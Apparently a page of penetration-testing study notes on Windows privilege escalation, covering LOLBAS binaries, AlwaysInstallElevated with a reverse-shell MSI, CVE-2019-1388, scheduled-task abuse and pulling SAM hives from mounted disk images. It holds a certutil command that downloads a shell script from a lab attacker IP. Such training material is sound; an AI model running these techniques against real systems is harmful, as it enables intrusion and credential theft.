Misc Techniques

Living Off The Land Binaries & Scripts (LOLBAS)

The LOLBAS project is the GTFObins for Windows.

Each of these binaries, scripts and libraries is a Microsoft-signed file that is either native to the operating system or can be downloaded directly from Microsoft and have unexpected functionality useful to an attacker:

Code execution

Code compilation

File transfers

Persistence

UAC bypass

Credential theft

Dumping process memory

Keylogging

Evasion

DLL hijacking

Example with certutil.exe whose intended use is for certificates.

We can use it to download a remote file:

certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat

We can also use it to encode a file in base64:

certutil -encode file1 encodedfile

And decode it:

certutil -decode encodedfile file2

There is also rundll32.exe which can be used to execute a DLL file.

Always Install Elevated

AlwaysInstallElevated is a functionality that offers all users(especially low-privileged user) on a windows machine to run any MSI file with elevated privileges. MSI is a Microsoft based installer package file format which is used for installing storing and removing of a program. MSI isn't the program itself.

This setting can be set via Local Group Policy by setting Always install with elevated privileges to Enabled under the following paths.

  • Computer Configuration\Administrative Templates\Windows Components\Windows Installer

  • User Configuration\Administrative Templates\Windows Components\Windows Installer

Enumerating Always Install Elevated Settings

For the current user:

System wide:

Generating Malicious MSI

This malicious msi will automatically run after being installed and it will spawn a reverse shell.

Installing the MIS

After install the program will run automatically and we should catch a shell.

CVE-2019-1388

CVE-2019-1388 was a privilege escalation vulnerability in the Windows Certificate Dialog, which did not properly enforce user privileges.

The issue was in the UAC mechanism, which presented an option to show information about an executable's certificate, opening the Windows certificate dialog when a user clicks the link.

When we click on the hyperlink, a browser window will launch running as NT AUTHORITY\SYSTEM. Once the browser is opened, it is possible to "break out" of it by leveraging the View page source menu option to launch a cmd.exe or PowerShell.exe console as SYSTEM.

More details on how to exploit here => https://academy.hackthebox.com/module/67/section/635

Scheduled Tasks

List scheduled tasks with CMD:

List scheduled tasks with Powershell:

By default, we can only see tasks created by our user and default scheduled tasks that every Windows operating system has. Unfortunately, we cannot list out scheduled tasks created by other users (such as admins) because they are stored in C:\Windows\System32\Tasks, which standard users do not have read access to.

Scheduled tasks usually run a script. If we have write access to one of those scripts we can replace it / append malicious code.

User/Computer Description Field

User:

Computer:

Mount VHDX/VMDK

  • .vhd => Virtual Hard Disk

  • .vhdx => Virtual Hard Disk v2

  • .vmdk => Virtual Machine Disk

If we find one of those, we can mount them:

VDMK:

VHD/VHDX:

Once its mounted we can access the C:\Windows\System32\Config directory and pull down the SAM, SECURITY and SYSTEM registry hives.

Then we can use secretsdump to extract the password hashes for local users:

PreviousPillagingNext6 - Legacy Systems

Last updated